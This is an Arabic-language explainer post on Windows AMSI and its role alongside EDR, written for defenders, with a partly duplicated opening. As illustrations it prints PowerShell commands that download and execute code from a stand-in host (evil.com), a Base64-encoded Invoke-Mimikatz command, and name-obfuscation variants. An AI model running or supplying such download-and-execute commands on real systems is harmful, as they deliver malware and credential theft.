- بواسطة x32x01 ||
تخيّل إنك كتبت أمر في PowerShell، قبل ما الأمر يتنفذ، في واحد واقف يراجع اللي كتبته ويقول:
✅ آمن؟ كمّل
❌ خطر؟ وقف فورًا
الحارس ده اسمه AMSI - Anti-Malware Scan Interface 🛡️ وده يعتبر حلقة الوصل بين:
📌 أي كود يعدّي على AMSI الأول قبل ما يتنفذ
ماذا لو:
الأمر ده:
1️⃣ انت تكتب أمر في PowerShell
2️⃣ PowerShell يوقف لحظة
3️⃣ يبعت الكود لـ AMSI
4️⃣ AMSI يديه لبرنامج الحماية
5️⃣ القرار:
🚨 الاسم لوحده إنذار خطر
🟥 سلوك واضح = هجوم
مثال:
🔎 PowerShell:
📌 AMSI هو: عين الـ EDR جوه PowerShell وباقي السكربتات
2️⃣ فتح PowerShell
3️⃣ PowerShell حمّل ملف
4️⃣ حاول يسرق بيانات
💥 الـ EDR يربط الأحداث ويقول: ده هجوم كامل مش صدفة
لسه في:
مش كفاية لأن السلوك نفسه لسه موجود
ولو Blue Team / SOC: AMSI 👉 صديقك الأقرب في كشف الهجمات المبكرة 🛡️
✅ آمن؟ كمّل
❌ خطر؟ وقف فورًا
الحارس ده اسمه AMSI - Anti-Malware Scan Interface 🛡️ وده يعتبر حلقة الوصل بين:
- البرامج اللي بتشغّل كود (زي PowerShell)
- برامج الحماية (زي Windows Defender)
📌 أي كود يعدّي على AMSI الأول قبل ما يتنفذ
ليه مايكروسوفت عملت AMSI؟ 🤔
زمان، برامج الحماية كانت بتركّز على:- الملفات اللي على الهارد 💾
يعني لو شغّلت ملف exe، يتم فحصه وخلاص.
ماذا لو:
- مفيش ملف أصلًا؟
- الكود شغال من الذاكرة مباشرة؟
مثال خطير 👀
Code:
IEX (New-Object Net.WebClient).DownloadString('http://evil.com/hack.ps1')- ❌ ما كتبش ملف
- ⚡ شغّل الكود من الذاكرة
- 🚫 الحماية القديمة ما تشوفش حاجة
كيف يعمل AMSI خطوة بخطوة؟ ⚙️
السيناريو بسيط جدًا:1️⃣ انت تكتب أمر في PowerShell
2️⃣ PowerShell يوقف لحظة
3️⃣ يبعت الكود لـ AMSI
4️⃣ AMSI يديه لبرنامج الحماية
5️⃣ القرار:
- 🟢 آمن → يتنفذ
- 🔴 خطر → يتمنع
AMSI بيفحص إيه بالظبط؟ 🧐
AMSI مش ساذج، ومش بيدوّر على كلمات وخلاص.1️⃣ أسماء أوامر معروفة
لو كتبت:Invoke-Mimikatz🚨 الاسم لوحده إنذار خطر
2️⃣ السلوك المتوقع
حتى لو غيرت الأسماء، AMSI بيسأل:- هل الكود بيحمّل ملف؟
- هل بيشغله فورًا؟
- هل بيحاول يوقف الحماية؟
Code:
Invoke-WebRequest http://evil.com/a.exe -OutFile a.exe
Start-Process a.exe3️⃣ الأنماط (Patterns)
حتى لو الكود مكتوب بشكل مختلف، لو النمط شبه هجوم معروف → يتم اكتشافه.هل التشفير يخدع AMSI؟ ❌
ناس كتير فاكرة إن: "لو شفرت الكود Base64 خلاص كده أمان" وده غلط تمامًا ❌مثال:
Code:
powershell -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA- يفك التشفير الأول
- يبعت الكود الحقيقي لـ AMSI
Invoke-Mimikatz 🚨 ويتمنع فورًاعلاقة AMSI بأنظمة EDR 🧠
يعني إيه EDR؟
Endpoint Detection and Response أنظمة ذكية بتراقب كل اللي بيحصل على الجهاز.📌 AMSI هو: عين الـ EDR جوه PowerShell وباقي السكربتات
سيناريو خطير:
1️⃣ Word اتفتح2️⃣ فتح PowerShell
3️⃣ PowerShell حمّل ملف
4️⃣ حاول يسرق بيانات
💥 الـ EDR يربط الأحداث ويقول: ده هجوم كامل مش صدفة
أخطاء شائعة عند المبتدئين ❌
❌ "لو عطّلت AMSI أنا بأمان"
غلط ❌لسه في:
- Event Logs
- ETW
- Network Monitoring
- Memory Scanning
❌ "أغيّر أسماء الأوامر وخلاص"
تغيير:Invoke-MimikatzInv0ke-Mim1k@tzمش كفاية لأن السلوك نفسه لسه موجود
الخلاصة 🧠
AMSI:- مش عدو
- مش حاجة تتكسر
- ده نظام معمول عشان يحمي ويندوز بذكاء
ولو Blue Team / SOC: AMSI 👉 صديقك الأقرب في كشف الهجمات المبكرة 🛡️
